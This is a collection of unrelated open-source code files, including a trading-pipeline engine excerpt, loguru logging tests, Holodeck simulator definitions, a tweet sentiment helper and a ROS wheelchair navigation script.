""" calendar = self._calendar start_idx, end_idx = calendar.slice_locs(start_date, end_date) if start_idx < extra_rows: raise NoFurtherDataError.from_lookback_window( initial_message="Insufficient data to compute Pipeline:", first_date=calendar[0], lookback_start=start_date, lookback_length=extra_rows, ) # Build lifetimes matrix reaching back to `extra_rows` days before # `start_date.` symbols = self._list_symbols() dates = calendar[start_idx - extra_rows:end_idx] symbols = sorted(symbols) lifetimes = pd.DataFrame(True, index=dates, columns=symbols) assert lifetimes.index[extra_rows] == start_date assert lifetimes.index[-1] == end_date if not lifetimes.columns.unique: columns = lifetimes.columns duplicated = columns[columns.duplicated()].unique() raise AssertionError("Duplicated sids: %d" % duplicated) # Filter out columns that didn't exist between the requested start and # end dates. existed = lifetimes.iloc[extra_rows:].any() ret = lifetimes.loc[:, existed] shape = ret.shape assert shape[0] * shape[1] != 0, 'root mask cannot be empty' return ret @staticmethod def _inputs_for_term(term, workspace, graph): """ Compute inputs for the given term. This is mostly complicated by the fact that for each input we store as many rows as will be necessary to serve **any** computation requiring that input. """ offsets = graph.offset out = [] if term.windowed: # If term is windowed, then all input data should be instances of # AdjustedArray. for input_ in term.inputs: adjusted_array = ensure_adjusted_array( workspace[input_], input_.missing_value, ) out.append( adjusted_array.traverse( window_length=term.window_length, offset=offsets[term, input_], ) ) else: # If term is not windowed, input_data may be an AdjustedArray or # np.ndarray. Coerce the former to the latter. for input_ in term.inputs: input_data = ensure_ndarray(workspace[input_]) offset = offsets[term, input_] # OPTIMIZATION: Don't make a copy by doing input_data[0:] if # offset is zero. if offset: input_data = input_data[offset:] out.append(input_data) return out def compute_chunk(self, graph, dates, symbols, initial_workspace): """ Compute the Pipeline terms in the graph for the requested start and end dates. Parameters ---------- graph : zipline.pipeline.graph.TermGraph dates : pd.DatetimeIndex Row labels for our root mask. symbols : list Column labels for our root mask. initial_workspace : dict Map from term -> output. Must contain at least entry for `self._root_mask_term` whose shape is `(len(dates), len(symbols))`, but may contain additional pre-computed terms for testing or optimization purposes. Returns ------- results : dict Dictionary mapping requested results to outputs. """ self._validate_compute_chunk_params(dates, symbols, initial_workspace) # get_loader = self.get_loader # Copy the supplied initial workspace so we don't mutate it in place. workspace = initial_workspace.copy() # If loadable terms share the same loader and extra_rows, load them all # together. loader_group_key = juxt( lambda x: x.dataset.get_loader(), getitem( graph.extra_rows)) loader_groups = groupby(loader_group_key, graph.loadable_terms) refcounts = graph.initial_refcounts(workspace) for term in graph.execution_order(refcounts): # `term` may have been supplied in `initial_workspace`, and in the # future we may pre-compute loadable terms coming from the same # dataset. In either case, we will already have an entry for this # term, which we shouldn't re-compute. if term in workspace: continue # Asset labels are always the same, but date labels vary by how # many extra rows are needed. mask, mask_dates = graph.mask_and_dates_for_term( term, self._root_mask_term, workspace, dates, ) if isinstance(term, LoadableTerm): to_load = sorted( loader_groups[loader_group_key(term)], key=lambda t: t.dataset ) loader = term.dataset.get_loader() loaded = loader.load_adjusted_array( to_load, mask_dates, symbols, mask, ) workspace.update(loaded) else: workspace[term] = term._compute( self._inputs_for_term(term, workspace, graph), mask_dates, symbols, mask, ) if term.ndim == 2: assert workspace[term].shape == mask.shape else: assert workspace[term].shape == (mask.shape[0], 1) # Decref dependencies of ``term``, and clear any terms whose # refcounts hit 0. for garbage_term in graph.decref_dependencies(term, refcounts): del workspace[garbage_term] out = {} graph_extra_rows = graph.extra_rows for name, term in iteritems(graph.outputs): # Truncate off extra rows from outputs. out[name] = workspace[term][graph_extra_rows[term]:] return out def _to_narrow(self, terms, data, mask, dates, symbols): """ Convert raw computed pipeline results into a DataFrame for public APIs. Parameters ---------- terms : dict[str -> Term] Dict mapping column names to terms. data : dict[str -> ndarray[ndim=2]] Dict mapping column names to computed results for those names. mask : ndarray[bool, ndim=2] Mask array of values to keep. dates : ndarray[datetime64, ndim=1] Row index for arrays `data` and `mask` symbols : list Column index Returns ------- results : pd.DataFrame The indices of `results` are as follows: index : two-tiered MultiIndex of (date, asset). Contains an entry for each (date, asset) pair corresponding to a `True` value in `mask`. columns : Index of str One column per entry in `data`. If mask[date, asset] is True, then result.loc[(date, asset), colname] will contain the value of data[colname][date, asset]. """ assert len(dates) == 1 if not mask.any(): # Manually handle the empty DataFrame case. This is a workaround # to pandas failing to tz_localize an empty dataframe with a # MultiIndex. It also saves us the work of applying a known-empty # mask to each array. # # Slicing `dates` here to preserve pandas metadata. # empty_dates = dates[:0] empty_assets = array([], dtype=object) return DataFrame( data={ name: array([], dtype=arr.dtype) for name, arr in iteritems(data) }, index=pd.Index(empty_assets), # index=MultiIndex.from_arrays([empty_dates, empty_assets]), ) # resolved_assets = array(self._finder.retrieve_all(assets)) # dates_kept = repeat_last_axis(dates.values, len(symbols))[mask] # assets_kept = repeat_first_axis(resolved_assets, len(dates))[mask] assets_kept = repeat_first_axis(symbols, len(dates))[mask] final_columns = {} for name in data: # Each term that computed an output has its postprocess method # called on the filtered result. # # As of Mon May 2 15:38:47 2016, we only use this to convert # LabelArrays into categoricals. final_columns[name] = terms[name].postprocess(data[name][mask]) return DataFrame( data=final_columns, index=pd.Index(assets_kept), # index=MultiIndex.from_arrays([dates_kept, assets_kept]), ) def _validate_compute_chunk_params( self, dates, symbols, initial_workspace): """ Verify that the values passed to compute_chunk are well-formed. """ root = self._root_mask_term clsname = type(self).__name__ # Writing this out explicitly so this errors in testing if we change # the name without updating this line. compute_chunk_name = self.compute_chunk.__name__ if root not in initial_workspace: raise AssertionError( "root_mask values not supplied to {cls}.{method}".format( cls=clsname, method=compute_chunk_name, ) ) shape = initial_workspace[root].shape implied_shape = len(dates), len(symbols) if shape != implied_shape: raise AssertionError( "root_mask shape is {shape}, but received dates/symbols " "imply that shape should be {implied}".format( shape=shape, implied=implied_shape, ) ) ``` #### File: pipeline-live/tests/test_alpaca.py ```python import pandas as pd import numpy as np from .datamock import mock_tradeapi from pipeline_live.data.alpaca.pricing import USEquityPricing def test_pricing_loader(refdata, alpaca_tradeapi, data_path): mock_tradeapi.list_assets(alpaca_tradeapi) mock_tradeapi.get_barset(alpaca_tradeapi) loader = USEquityPricing.get_loader() columns = [USEquityPricing.close] dates = [pd.Timestamp('2018-08-22', tz='UTC')] symbols = ['AA'] mask = np.zeros((1, 1), dtype='bool') out = loader.load_adjusted_array(columns, dates, symbols, mask) assert out[USEquityPricing.close]._data.shape == (1, 1) ```
{ "source": "joshglenen/Rating-Recalculator", "score": 2 }
#### File: joshglenen/Rating-Recalculator/runApp.py ```python import sys from flask import Flask, render_template, json, request import HTML_IMDB app = Flask(__name__) @app.route('/') def display(): return render_template('index.html') @app.route('/<url>', methods=['POST']) def execute(url): return HTML_IMDB.findID(url,0) # TODO: implement dropdown menu with index if __name__ == '__main__': app.run() ```
{ "source": "JoshGoA/scinet", "score": 3 }
#### File: scinet/tests/test_graph.py ```python import unittest from scinet import Graph class TestGraph(unittest.TestCase): def setUp(self): self.G = Graph() def test_init(self): self.assertFalse(self.G) def test_add_vertex(self): for vertex in range(5): self.G.add_vertex(vertex) self.assertIn(vertex, self.G) def test_add_edge(self): for source_vertex, target_vertex, edge in zip(range(5), range(5), range(5)): self.G.add_edge(source_vertex, target_vertex, edge) self.assertIn(edge, self.G[source_vertex][target_vertex]) def test_remove_vertex(self): self.test_add_vertex() for vertex in set(self.G.vertices()): self.G.remove_vertex(vertex) self.assertNotIn(vertex, self.G) def test_remove_edge(self): self.test_add_edge() for source_vertex, target_vertex in set(self.G.edges()): self.G.remove_edge(source_vertex, target_vertex) self.assertNotIn(target_vertex, self.G[source_vertex]) if __name__ == '__main__': unittest.main() ```
{ "source": "joshgordon/loguru", "score": 3 }
#### File: loguru/loguru/_recattrs.py ```python from collections import namedtuple class LevelRecattr(str): __slots__ = ("name", "no", "icon") class FileRecattr(str): __slots__ = ("name", "path") class ThreadRecattr(str): __slots__ = ("name", "id") class ProcessRecattr(str): __slots__ = ("name", "id") class ExceptionRecattr(namedtuple("ExceptionRecattr", ("type", "value", "traceback"))): def __reduce__(self): exception = (self.type, self.value, None) # tracebacks are not pickable return (ExceptionRecattr, exception) ``` #### File: source/backtrace/function.py ```python import sys from loguru import logger logger.remove() logger.add(sys.stderr, format="", colorize=False, backtrace=True, diagnose=False) @logger.catch() def a(): 1 / 0 def b(): 2 / 0 def c(): 3 / 0 a() with logger.catch(): b() try: c() except ZeroDivisionError: logger.exception("") ``` #### File: source/backtrace/missing_attributes_traceback_objects.py ```python import sys from loguru import logger from collections import namedtuple logger.remove() logger.add(sys.stderr, format="", colorize=False, backtrace=True, diagnose=False) a, b = 1, 0 def div(x, y): x / y def foo(): div(a, b) # See Twisted: https://git.io/fjJ48 # See Billiard: https://git.io/fjJ44 fake_code = namedtuple("fake_code", ("co_filename", "co_name")) fake_frame = namedtuple("fake_frame", ("f_back", "f_code", "f_globals", "f_lineno", "f_locals")) fake_traceback = namedtuple("fake_traceback", ("tb_frame", "tb_lasti", "tb_lineno", "tb_next")) def make_fake(tb): if not tb: return None code = fake_code(tb.tb_frame.f_code.co_filename, tb.tb_frame.f_code.co_name) frame = fake_frame(None, code, {}, tb.tb_lineno, {}) tb = fake_traceback(frame, tb.tb_lasti, tb.tb_lineno, make_fake(tb.tb_next)) return tb try: foo() except ZeroDivisionError: type_, value, tb = sys.exc_info() tb = make_fake(tb) logger.opt(exception=(type_, value, tb)).error("") ``` #### File: source/others/sys_tracebacklimit.py ```python import sys from loguru import logger logger.remove() logger.add(sys.stderr, format="", diagnose=False, backtrace=False, colorize=False) logger.add(sys.stderr, format="", diagnose=True, backtrace=False, colorize=False) logger.add(sys.stderr, format="", diagnose=False, backtrace=True, colorize=False) logger.add(sys.stderr, format="", diagnose=True, backtrace=True, colorize=False) def a(): b() def b(): c() def c(): d() def d(): e() def e(): f() def f(): g() def g(): h() def h(): i() def i(): j(1, 0) def j(a, b): a / b sys.tracebacklimit = 5 try: a() except ZeroDivisionError: logger.exception("") ``` #### File: loguru/tests/test_add_option_enqueue.py ```python from loguru import logger import time def test_enqueue(): x = [] def sink(message): time.sleep(0.1) x.append(message) logger.add(sink, format="{message}", enqueue=True) logger.debug("Test") assert len(x) == 0 time.sleep(0.2) assert len(x) == 1 assert x[0] == "Test\n" def test_enqueue_with_exception(): x = [] def sink(message): time.sleep(0.1) x.append(message) logger.add(sink, format="{message}", enqueue=True) try: 1 / 0 except ZeroDivisionError: logger.exception("Error") assert len(x) == 0 time.sleep(0.2) assert len(x) == 1 lines = x[0].splitlines() assert lines[0] == "Error" assert lines[-1] == "ZeroDivisionError: division by zero" ``` #### File: loguru/tests/test_parse.py ```python import pytest import re import pathlib import io from datetime import datetime from loguru import logger TEXT = "This\nIs\nRandom\nText\n123456789\nABC!DEF\nThis Is The End\n" @pytest.fixture def fileobj(): with io.StringIO(TEXT) as file: yield file def test_parse_file(tmpdir): file = tmpdir.join("test.log") file.write(TEXT) result, *_ = list(logger.parse(str(file), r"(?P<num>\d+)")) assert result == dict(num="123456789") def test_parse_fileobj(tmpdir): file = tmpdir.join("test.log") file.write(TEXT) result, *_ = list(logger.parse(open(str(file)), r"^(?P<t>\w+)")) assert result == dict(t="This") def test_parse_pathlib(tmpdir): file = tmpdir.join("test.log") file.write(TEXT) result, *_ = list(logger.parse(pathlib.Path(str(file)), r"(?P<r>Random)")) assert result == dict(r="Random") def test_parse_string_pattern(fileobj): result, *_ = list(logger.parse(fileobj, r"(?P<num>\d+)")) assert result == dict(num="123456789") def test_parse_regex_pattern(fileobj): regex = re.compile(r"(?P<maj>[a-z]*![a-z]*)", flags=re.I) result, *_ = list(logger.parse(fileobj, regex)) assert result == dict(maj="ABC!DEF") def test_parse_multiline_pattern(fileobj): result, *_ = list(logger.parse(fileobj, r"(?P<text>This[\s\S]*Text\n)")) assert result == dict(text="This\nIs\nRandom\nText\n") def test_parse_without_group(fileobj): result, *_ = list(logger.parse(fileobj, r"\d+")) assert result == {} def test_parse_bytes(): with io.BytesIO(b"Testing bytes!") as fileobj: result, *_ = list(logger.parse(fileobj, br"(?P<ponct>[?!:])")) assert result == dict(ponct=b"!") @pytest.mark.parametrize("chunk", [-1, 1, 2 ** 16]) def test_chunk(fileobj, chunk): result, *_ = list(logger.parse(fileobj, r"(?P<a>[ABC]+)", chunk=chunk)) assert result == dict(a="ABC") def test_positive_lookbehind_pattern(): text = "ab" * 100 pattern = r"(?<=a)(?P<b>b)" with io.StringIO(text) as file: result = list(logger.parse(file, pattern, chunk=9)) assert result == [dict(b="b")] * 100 def test_greedy_pattern(): text = ("\n" + "a" * 100) * 1000 pattern = r"\n(?P<a>a+)" with io.StringIO(text) as file: result = list(logger.parse(file, pattern, chunk=30)) assert result == [dict(a="a" * 100)] * 1000 def test_cast_dict(tmpdir): file = tmpdir.join("test.log") file.write("[123] [1.1] [2017-03-29 11:11:11]\n") regex = r"\[(?P<num>.*)\] \[(?P<val>.*)\] \[(?P<date>.*)\]" caster = dict(num=int, val=float, date=lambda d: datetime.strptime(d, "%Y-%m-%d %H:%M:%S")) result = next(logger.parse(str(file), regex, cast=caster)) assert result == dict(num=123, val=1.1, date=datetime(2017, 3, 29, 11, 11, 11)) def test_cast_function(tmpdir): file = tmpdir.join("test.log") file.write("[123] [1.1] [2017-03-29 11:11:11]\n") regex = r"\[(?P<num>.*)\] \[(?P<val>.*)\] \[(?P<date>.*)\]" def caster(groups): groups["num"] = int(groups["num"]) groups["val"] = float(groups["val"]) groups["date"] = datetime.strptime(groups["date"], "%Y-%m-%d %H:%M:%S") result = next(logger.parse(str(file), regex, cast=caster)) assert result == dict(num=123, val=1.1, date=datetime(2017, 3, 29, 11, 11, 11)) def test_cast_with_irrelevant_arg(tmpdir): file = tmpdir.join("test.log") file.write("[123] Blabla") regex = r"\[(?P<a>\d+)\] .*" caster = dict(a=int, b=float) result = next(logger.parse(str(file), regex, cast=caster)) assert result == dict(a=123) def test_cast_with_irrelevant_value(tmpdir): file = tmpdir.join("test.log") file.write("[123] Blabla") regex = r"\[(?P<a>\d+)\] (?P<b>.*)" caster = dict(a=int) result = next(logger.parse(str(file), regex, cast=caster)) assert result == dict(a=123, b="Blabla") @pytest.mark.parametrize("file", [object(), 123, dict]) def test_invalid_file(file): with pytest.raises(ValueError): next(logger.parse(file, r"pattern")) @pytest.mark.parametrize("pattern", [object(), 123, dict]) def test_invalid_pattern(fileobj, pattern): with pytest.raises(ValueError): next(logger.parse(fileobj, pattern)) @pytest.mark.parametrize("cast", [object(), 123]) def test_invalid_cast(fileobj, cast): with pytest.raises(ValueError): next(logger.parse(fileobj, r"pattern", cast=cast)) ```
{ "source": "joshgoshbgosh/ccs-final-project", "score": 3 }
#### File: ccs-final-project/accounts/models.py ```python from django.db import models from django.conf import settings from django.contrib.auth.models import AbstractUser class User(AbstractUser): username = models.CharField(max_length=255) class Profile(models.Model): # https://docs.djangoproject.com/en/3.1/topics/db/examples/one_to_one/#one-to-one-relationships user = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name="profile", blank=True) phone_number = models.CharField(max_length=12, blank=True) def __str__(self): return self.user.username ```
{ "source": "joshgreaves/Holodeck", "score": 2 }
#### File: Holodeck/holodeck/exceptions.py ```python class HolodeckException(Exception): """HolodeckException. Args: message (str): The error string. """ def __init__(self, message): super(HolodeckException, self).__init__(message) ``` #### File: Holodeck/holodeck/hyperparameters.py ```python from holodeck.agents import * class Hyperparameters: """This class contains an easy way of accessing the expected size of the hyperparameter array for an agent.""" _shape_dict = { UavAgent: [27] } @staticmethod def shape(agent_type): """Get the shape of the hyperparameter array for the specified agent""" return Hyperparameters._shape_dict[agent_type] if agent_type in Hyperparameters._shape_dict else [1] class UAVHyperparameters: """This class contains the indices of the UAV's hyperparameters The variables appended with a P, I, or D apply to the proportional, integral, and derivative part of the internal PID controller of the UAV. The variables with TAU are the "Process Time Constants" - the value that we calculated (admittedly imperfectly) to be the amount of time (in seconds) for the UAV to reach 63.2% of its output in the respective aspect. Changing Tau will cause overshooting the target or arriving late to the target, depending. """ NUMBER_OF_ELEMENTS = 0 # this is the first item in the buffer, not the actual number of elements UAV_MASS = 1 UAV_MU = 2 UAV_MAX_ROLL = 3 UAV_MAX_PITCH = 4 UAV_MAX_YAW_RATE = 5 UAV_MAX_FORCE = 6 UAV_TAU_UP_ROLL = 7 UAV_TAU_UP_PITCH = 8 UAV_TAU_UP_YAW_RATE = 9 UAV_TAU_UP_FORCE = 10 UAV_TAU_DOWN_ROLL = 11 UAV_TAU_DOWN_PITCH = 12 UAV_TAU_DOWN_YAW_RATE = 13 UAV_TAU_DOWN_FORCE = 14 UAV_ROLL_P = 15 UAV_ROLL_I = 16 UAV_ROLL_D = 17 UAV_PITCH_P = 18 UAV_PITCH_I = 19 UAV_PITCH_D = 20 UAV_YAW_P = 21 UAV_YAW_I = 22 UAV_YAW_D = 23 UAV_ALT_P = 24 UAV_ALT_I = 25 UAV_ALT_D = 26 ``` #### File: Holodeck/holodeck/sensors.py ```python import numpy as np class Sensors: """Class information of sensor data with mappings from names to corresponding numbers Attributes: TERMINAL (int): Index for terminal sensor output. Value is 1. REWARD (int): Index for reward sensor output. Value is 2. PRIMARY_PLAYER_CAMERA (int): Deprecated. Index for primary player camera sensor. Value is 3. PIXEL_CAMERA (int): Index for pixel camera sensor. Value is 4. ORIENTATION_SENSOR (int): Index for orientation sensor. Value is 5. IMU_SENSOR (int): Index for IMU sensor. Value is 6. JOINT_ROTATION_SENSOR (int): Index for joint rotation sensor. Value is 7. RELATIVE_SKELETAL_POSITION_SENSOR (int): Index for relative skeletal position sensor. Value is 8. LOCATION_SENSOR (int): Index for location sensor. Value is 9. VELOCITY_SENSOR (int): Index for velocity sensor. Value is 10. ROTATION_SENSOR (int): Index for rotation sensor. Value is 11. COLLISION_SENSOR (int): Index for collision sensor. Value is 12. PRESSURE_SENSOR (int): Index for pressure sensor. Value is 13. """ TERMINAL = 1 REWARD = 2 PRIMARY_PLAYER_CAMERA = 3 # default is 512 x 512 RGBA PIXEL_CAMERA = 4 # default is 512 x 512 RGBA ORIENTATION_SENSOR = 5 IMU_SENSOR = 6 JOINT_ROTATION_SENSOR = 7 RELATIVE_SKELETAL_POSITION_SENSOR = 8 LOCATION_SENSOR = 9 VELOCITY_SENSOR = 10 ROTATION_SENSOR = 11 COLLISION_SENSOR = 12 PRESSURE_SENSOR = 13 # Sizes are the number of entries in the numpy array _shape_dict = { TERMINAL: [1], REWARD: [1], PRIMARY_PLAYER_CAMERA: [512, 512, 4], PIXEL_CAMERA: [256, 256, 4], ORIENTATION_SENSOR: [3, 3], IMU_SENSOR: [2, 3], JOINT_ROTATION_SENSOR: [94], RELATIVE_SKELETAL_POSITION_SENSOR: [67, 4], LOCATION_SENSOR: [3], VELOCITY_SENSOR: [3], ROTATION_SENSOR: [3], COLLISION_SENSOR: [1], PRESSURE_SENSOR: [48*(3+1)], } _type_dict = { TERMINAL: np.bool, REWARD: np.float32, PRIMARY_PLAYER_CAMERA: np.uint8, PIXEL_CAMERA: np.uint8, ORIENTATION_SENSOR: np.float32, IMU_SENSOR: np.float32, JOINT_ROTATION_SENSOR: np.float32, RELATIVE_SKELETAL_POSITION_SENSOR: np.float32, LOCATION_SENSOR: np.float32, VELOCITY_SENSOR: np.float32, ROTATION_SENSOR: np.float32, COLLISION_SENSOR: np.bool, PRESSURE_SENSOR: np.float32, } _name_dict = { TERMINAL: "Terminal", REWARD: "Reward", PRIMARY_PLAYER_CAMERA: "PrimaryPlayerCamera", PIXEL_CAMERA: "PixelCamera", ORIENTATION_SENSOR: "OrientationSensor", IMU_SENSOR: "IMUSensor", JOINT_ROTATION_SENSOR: "JointRotationSensor", RELATIVE_SKELETAL_POSITION_SENSOR: "RelativeSkeletalPositionSensor", LOCATION_SENSOR: "LocationSensor", VELOCITY_SENSOR: "VelocitySensor", ROTATION_SENSOR: "RotationSensor", COLLISION_SENSOR: "CollisionSensor", PRESSURE_SENSOR: "PressureSensor" } _reverse_name_dict = {v: k for k, v in _name_dict.items()} @staticmethod def shape(sensor_type): """Gets the shape of a particular sensor. Args: sensor_type (int): The type of the sensor. Returns: List of int: The shape of the sensor data. """ return Sensors._shape_dict[sensor_type] if sensor_type in Sensors._shape_dict else None @staticmethod def name(sensor_type): """Gets the human readable name for a sensor. Args: sensor_type (int): The type of the sensor. Returns: str: The name of the sensor. """ return Sensors._name_dict[sensor_type] if sensor_type in Sensors._name_dict else None @staticmethod def dtype(sensor_type): """Gets the data type of the sensor data (the dtype of the numpy array). Args: sensor_type (int): The type of the sensor. Returns: type: The type of the sensor data. """ return Sensors._type_dict[sensor_type] if sensor_type in Sensors._type_dict else None @staticmethod def name_to_sensor(sensor_name): """Gets the index value of a sensor from its human readable name. Args: sensor_name (str): The human readable name of the sensor. Returns: int: The index value for the sensor. """ return Sensors._reverse_name_dict[sensor_name] if sensor_name in Sensors._reverse_name_dict else None @staticmethod def set_primary_cam_size(height, width): """Sets the primary camera size for this world. Should only be called by environment. Args: height (int): New height value. width (int): New width value. """ Sensors._shape_dict[Sensors.PRIMARY_PLAYER_CAMERA] = [height, width, 4] @staticmethod def set_pixel_cam_size(height, width): """Sets the pixel camera size for this world. Should only be called by Environment. Args: height (int): New height value. width (int): New width value. """ Sensors._shape_dict[Sensors.PIXEL_CAMERA] = [height, width, 4] def __init__(self): print("No point in instantiating an object.") ``` #### File: Holodeck/holodeck/util.py ```python import math import os try: unicode # Python 2 except NameError: unicode = str # Python 3 def get_holodeck_path(): """Gets the path of the holodeck environment Returns: (str): path to the current holodeck environment """ if "HOLODECKPATH" in os.environ and os.environ["HOLODECKPATH"] != "": return os.environ["HOLODECKPATH"] if os.name == "posix": return os.path.expanduser("~/.local/share/holodeck") elif os.name == "nt": return os.path.expanduser("~\\AppData\\Local\\holodeck") else: raise NotImplementedError("holodeck is only supported for Linux and Windows") def convert_unicode(value): """Resolves python 2 issue with json loading in unicode instead of string Args: value (str): Unicode value to be converted Returns: (str): converted string """ if isinstance(value, dict): return {convert_unicode(key): convert_unicode(value) for key, value in value.iteritems()} elif isinstance(value, list): return [convert_unicode(item) for item in value] elif isinstance(value, unicode): return value.encode('utf-8') else: return value def get_os_key(): """Gets the key for the OS. Returns: str: "Linux" or "Windows". Throws NotImplementedError for other systems. """ if os.name == "posix": return "Linux" elif os.name == "nt": return "Windows" else: raise NotImplementedError("holodeck is only supported for Linux and Windows") def human_readable_size(size_bytes): """Gets a number of bytes as a human readable string. Args: size_bytes (int): The number of bytes to get as human readable. Returns: str: The number of bytes in a human readable form. """ if size_bytes == 0: return "0B" size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB") i = int(math.floor(math.log(size_bytes, 1024))) p = math.pow(1024, i) s = round(size_bytes / p, 2) return "%s %s" % (s, size_name[i]) ```
{ "source": "josh-gree/conf_speeches", "score": 3 }
#### File: SOU/spiders/SOU_spider.py ```python import scrapy from SOU.items import SouItem from bs4 import BeautifulSoup class SOUSpider(scrapy.Spider): name = "souspider" allowed_domains = ["stateoftheunion.onetwothree.net"] start_urls = ("http://stateoftheunion.onetwothree.net/texts/index.html",) def parse(self, response): links = map(response.urljoin,response.css('a::attr(href)')[5:-2].extract()) for link in links: yield scrapy.Request(link,callback=self.extract_speech) def extract_speech(self,response): text = ''.join(response.css('p').extract()) text = BeautifulSoup(text).text.replace("\n"," ") speaker = response.css('h2::text').extract()[0] date = int(response.css('h3::text').extract()[0].split()[-1]) item = SouItem() item['text'] = text item['speaker'] = speaker item['date'] = date yield item ```
{ "source": "josh-gree/debatesnlp", "score": 3 }
#### File: src/data/helper_functions.py ```python from itertools import islice from numpy import array, nan import pandas as pd from tempfile import NamedTemporaryFile import preprocessor as p import re import subprocess def try_extract(d,field): try: return d[field] except Exception: return None def chunker(iterable, n): iterable = iter(iterable) count = 0 group = [] while True: try: group.append(iterable.next()) count += 1 if count % n == 0: yield group group = [] except StopIteration: yield group break def extract_name(d): if d[3] != None: return d[3]['full_name'] else: return None def extract_centroid(d): if d[3] != None: return array(d[3]['bounding_box']['coordinates']).mean(axis=1)[0] else: return None def make_df(data_chunk,i,base_fname): fname = '../../data/processed/{}_{}.csv'.format(base_fname,i) coords = [extract_centroid(d) for d in data_chunk] place_names = [extract_name(d) for d in data_chunk] tweets = [d[0] for d in data_chunk] dates = [pd.to_datetime(int(d[1])*1000000) for d in data_chunk] data_chunk = {'coord':coords,'place_name':place_names,'tweet':tweets,'date':dates} df = pd.DataFrame(data_chunk) df = df.drop_duplicates(subset=['tweet']) df = df.fillna(value=nan) df['long'] = df.iloc[:,0].map(lambda x : x[0],na_action='ignore') df['lat'] = df.iloc[:,0].map(lambda x : x[1],na_action='ignore') df = df.drop('coord',axis=1) regex = re.compile('[\.\t\,\:;\(\)\.\?\*\%\'\!\+\"]') df.tweets = df.tweet.map(lambda x : x.encode('utf-8').strip()) df['cleaned_tweet'] = df.tweets.map(p.clean) df['cleaned_tweet'] = df.cleaned_tweet.map(lambda x : regex.sub('',x).lower()) df = df.reset_index() df = df.drop('index',axis=1) t1 = NamedTemporaryFile() t2 = NamedTemporaryFile() t3 = NamedTemporaryFile() df.tweet.to_csv(t1.name,encoding='utf-8',index=False) df.cleaned_tweet.to_csv(t2.name,encoding='utf-8',index=False) subprocess.call('curl --data-binary @{} "http://www.sentiment140.com/api/bulkClassify" > {}'.format(t1.name,t3.name),shell=True) pols = pd.read_csv(t3.name,header=None) df['polarity'] = pols[0] subprocess.call('curl --data-binary @{} "http://www.sentiment140.com/api/bulkClassify" > {}'.format(t2.name,t3.name),shell=True) pols = pd.read_csv(t3.name,header=None) df['polarity_cl'] = pols[0] t1.close() t2.close() t3.close() df.to_csv(fname,encoding='utf-8') ```
{ "source": "joshgreen5157/ros_wheelchair", "score": 2 }
#### File: Robotics Code 2021/scripts/rviz_nav.py ```python import os import time import rospy import serial import pickle import actionlib import subprocess as sp import multiprocessing as mp from std_msgs.msg import String from geometry_msgs.msg import PoseStamped,Twist, PoseWithCovarianceStamped, Pose2D from actionlib_msgs.msg import GoalStatusArray from move_base_msgs.msg import MoveBaseAction # Launch ROS process def ROSProcess(): sp.run('roslaunch navigation hector_map.launch', shell = True, check = True, stdout = sp.PIPE, stderr = sp.STDOUT) # Establish serial communication with external device def setupComPort(comPort): serialPort = serial.Serial(port = comPort, baudrate = 9600, bytesize=8, timeout=2, stopbits=serial.STOPBITS_ONE) return serialPort # Create necessary global variables COM = setupComPort("/dev/ttyACM0") serialCounter = 0 cancelBool = False freeze = "False" # Clear the map on rViz (NOT CURRENTLY IN USE, IF USED ALLOW TIME FOR MAP TO REPOPULATE) def clearMap(): print("Clearing MAP") clear_publisher = rospy.Publisher("syscommand", String, queue_size=5) msg = "reset" clear_publisher.publish(msg) # send a new target goal to rViz (NOT CURRENTLY IN USE) def setGoal(msg): goal_publisher = rospy.Publisher("move_base_simple/goal", PoseStamped, queue_size=5) goal = PoseStamped() if msg.pose != goal.pose: writeCommand(COM, 'a') goal.header.seq = 1 goal.header.frame_id = "map" goal.header.stamp = rospy.Time.now() goal.pose = msg.pose goal_publisher.publish(goal) time.sleep(2) # Translate the desired command and assign it the proper numeric value def translateCommands(target): global COM lineA = float(target.linear.x) lineB = float(target.angular.z) if lineA> 0: lineA = lineA+210 elif lineA< 0: lineA = lineA+100 elif lineA == 0: lineA = 135 if lineB> 0: lineB = lineB+155 elif lineB< 0: lineB = lineB+112 elif lineB == 0: lineB = lineB+135 lineA = 'A' + str(int(lineA)) lineB = 'B' + str(int(lineB)) print('x = ',target.linear.x,'a = ', lineA) print('y = ',target.angular.z,'b = ', lineB) writeCommand(COM, lineA) writeCommand(COM, lineB) # Format the desired command and send it over the open COM port def writeCommand(comPort, strvar): comPort.write(str.encode(strvar + '*')) # Translate and send velocity commands received from rViz, flush serial line every 25 messages sent to prevent overloading def navCommandsReceived(poses): global COM global freeze global serialCounter if freeze == "False": translateCommands(poses) if serialCounter == 25: COM.flushInput() COM.flushOutput() serialCounter = 0 serialCounter = serialCounter+1 # When new target goal is reached, send an 'a' command to put the wheelchair in autonomous mode def newGoalReceived(target): global COM global cancelBool cancelBool = True writeCommand(COM,'a') time.sleep(.5) writeCommand(COM,'a') # When Target location is reach send a DONE command and clear the goal from Rviz def targetReached(status): global COM global cancelBool if status.status_list != []: if status.status_list[0].status == 3 and cancelBool == True: print('Target reached') writeCommand(COM, 'DONE') move_base = actionlib.SimpleActionClient('/servicebot/move_base', MoveBaseAction) move_base.cancel_all_goals() cancelBool = False # Check the camera output for Wheelchair Freeze command def checkCamera(pose): global freeze global COM if os.path.getsize("/home/max/shared.pkl") > 0: fp = open("/home/max/shared.pkl", "rb") freeze = pickle.load(fp) if freeze == "True": print('checkCamera ', freeze) stopWheelchair() # Send Stop command to wheelchair def stopWheelchair(): global COM writeCommand(COM, 'A135') writeCommand(COM, 'B135') # Looping listener for ROS Topics def listener(): global freeze rospy.init_node('listener',anonymous=True) rospy.Subscriber('/pose2D', Pose2D, checkCamera) rospy.Subscriber('/move_base_simple/goal', PoseStamped, newGoalReceived) rospy.Subscriber('/cmd_vel', Twist, navCommandsReceived) rospy.Subscriber('/move_base/status', GoalStatusArray, targetReached) rospy.spin() # Launch ROS and rVIZ, start listener process def main(): p = mp.Process(target=ROSProcess) p.start() time.sleep(10) l = mp.Process(target=listener) l.start() # sp.run('mark3.py', shell = True, check = True, stdout = sp.PIPE, stderr = sp.STDOUT) time.sleep(5) print('Ready for target location') p.join() l.join() if __name__ == '__main__': print('Start navigation script') main() ```
{ "source": "JoshGreenslade/Flowers", "score": 2 }
